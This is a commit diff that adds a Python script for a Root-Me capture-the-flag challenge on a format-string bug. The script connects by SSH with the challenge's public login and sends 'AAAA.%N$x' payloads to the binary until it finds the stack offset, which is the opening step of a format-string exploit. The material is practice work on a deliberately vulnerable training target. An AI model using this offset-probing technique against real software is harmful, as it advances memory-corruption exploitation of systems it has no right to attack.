feat: app system challenges

Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>

app-system/elf-x86-format-string-bug-basic-2/scripts/find_offset.py

@@ -0,0 +1,51 @@
+#!/usr/bin/env python3
+import base64
+import re
+import shlex
+
+import paramiko
+
+
+HOST = "challenge02.root-me.org"
+PORT = 2222
+USER = "app-systeme-ch14"
+PASSWORD = "app-systeme-ch14"
+BIN = "/challenge/app-systeme/ch14/ch14"
+
+
+def run_payload(ssh: paramiko.SSHClient, payload: bytes, pty: bool = False) -> str:
+    b64 = base64.b64encode(payload).decode()
+    py = f"import os,base64;p=base64.b64decode('{b64}');os.execv('{BIN}',[b'ch14',p])"
+    cmd = "python3 -c " + shlex.quote(py)
+    _, stdout, _ = ssh.exec_command(cmd, get_pty=pty)
+    return stdout.read().decode("latin-1", "ignore")
+
+
+def main() -> None:
+    ssh = paramiko.SSHClient()
+    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+    ssh.connect(HOST, port=PORT, username=USER, password=PASSWORD, timeout=10)
+
+    try:
+        found = None
+        for i in range(1, 80):
+            payload = f"AAAA.%{i}$x".encode()
+            out = run_payload(ssh, payload)
+            m = re.search(r"fmt=\[(.*)\]", out)
+            if not m:
+                continue
+            fmt_out = m.group(1).lower()
+            if "41414141" in fmt_out:
+                found = i
+                print(f"[+] offset found: {i}")
+                print(f"[+] fmt output: {m.group(1)}")
+                break
+
+        if found is None:
+            print("[-] offset not found in tested range")
+    finally:
+        ssh.close()
+
+
+if __name__ == "__main__":
+    main()